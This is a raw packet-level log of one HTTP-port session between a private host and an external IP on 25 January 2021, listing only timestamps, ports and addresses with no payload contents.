Jan 25, 2021 11:20:44.294884920 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.294923067 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.294949055 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.294962883 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295002937 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295007944 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295022964 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295041084 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295070887 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295072079 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295109987 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295135975 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295161009 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295170069 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295197964 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295236111 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295274019 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295295000 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295320988 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295361996 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295402050 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295406103 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295428991 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295459032 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295468092 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295506001 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295545101 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295563936 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295583963 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295594931 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295620918 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295648098 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295650959 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295680046 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295687914 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295730114 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295747995 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295757055 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295782089 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295819998 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295856953 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.295881033 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.295944929 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.434077024 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434146881 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434175014 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434200048 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434237957 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434286118 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434292078 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.434313059 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434319019 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.434341908 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.434351921 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434355021 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.434397936 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.434408903 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434453964 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434463978 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.434479952 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434521914 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434561968 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434600115 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434638977 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434667110 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.434812069 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434844971 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.434854984 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.434855938 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.434894085 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.435846090 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.435885906 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.435924053 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.435940027 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.435961008 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.435973883 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.435998917 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.436012030 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.436042070 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.440009117 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.440074921 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.440104961 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.440135002 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.440274000 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.440301895 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.440305948 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.440840006 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.440892935 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.440937042 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.440953970 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.440965891 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441004038 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441031933 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441051006 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.441068888 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441107035 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441143990 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441155910 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.441189051 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.441190958 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441221952 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441242933 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.441257954 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441267967 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.441286087 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441351891 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.441800117 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441842079 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441879034 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441903114 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441940069 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.441942930 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.441977024 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.442028046 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.442838907 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.442869902 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.442905903 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.442951918 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.442958117 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.443120003 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.576071978 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.576129913 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.576149940 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.576179981 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.576220036 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.576389074 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.576431990 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.576898098 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.576936960 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.576973915 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.577013016 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.577028036 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.577039003 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.577095032 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.577871084 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.577900887 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.577936888 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.577963114 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.577986956 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.578018904 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.578033924 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.578077078 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.578113079 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.578150988 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.578150988 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.578187943 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.578187943 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.578217983 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.578269958 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.581901073 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.581952095 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.581980944 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.582077026 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.583910942 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.583955050 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.583992004 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584017992 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584053993 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584080935 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.584100962 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584131956 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.584141970 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.584156990 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584182978 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584270000 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.584292889 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.584810972 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584852934 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584892988 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584918022 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584956884 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.584956884 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.584985971 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585016012 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.585026026 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585026979 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.585073948 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585108042 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.585118055 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585136890 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.585156918 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585176945 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.585185051 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585211992 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585226059 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.585247993 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585263968 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.585288048 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585313082 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585330963 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.585362911 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.585371971 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.585441113 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.585443020 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.587398052 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.721044064 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.721112967 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.721132994 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.721151114 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.721190929 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.721215963 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.721254110 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.721291065 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.721343994 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.721379042 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.721399069 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.721401930 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.721920013 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.721951008 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.721988916 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722028971 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722033024 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722044945 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722053051 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722078085 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722085953 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722110987 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722136974 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722148895 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722192049 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722230911 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722248077 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722268105 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722280025 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722306967 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722331047 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722345114 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722381115 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722399950 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722423077 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722450018 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722451925 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722479105 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722489119 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722527027 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722537994 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722553015 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722578049 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722595930 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722615957 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722620964 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722664118 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722666025 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722717047 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722774982 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722812891 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722851038 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722875118 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722877979 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722915888 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.722925901 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722969055 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.722980022 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723005056 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723016977 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723031998 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723048925 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723071098 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723112106 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723121881 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723150015 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723160982 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723189116 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723201990 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723237038 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723237991 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723268986 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723285913 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723306894 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723331928 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723359108 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723368883 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723404884 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723416090 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723444939 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723458052 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723472118 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723489046 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723520994 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.723902941 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.723932981 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.724767923 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.724850893 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.724900961 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.724931955 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.724958897 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.724968910 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.724994898 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.725018024 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.725033045 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.725070000 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.725085974 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.725107908 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.725119114 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.725133896 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.725163937 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.725881100 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.725910902 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.725939035 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.725950003 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.725990057 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.726001978 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.726030111 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.726035118 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.726068974 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.726080894 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.727705956 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.727796078 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.727838993 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.727875948 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.727891922 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.727915049 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.727926016 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.727953911 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.727958918 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.727991104 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.728003025 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.728029013 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.728077888 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.728676081 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.728775024 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.729439020 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.864031076 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.864089966 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.864136934 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.864253044 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.864300966 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.864861012 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.864907980 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.864945889 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.864983082 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.865027905 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.865067959 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.865883112 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.865982056 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.866951942 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.866993904 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.867029905 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.867069960 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.867069960 CET	49165	80	192.168.2.22	217.144.106.11
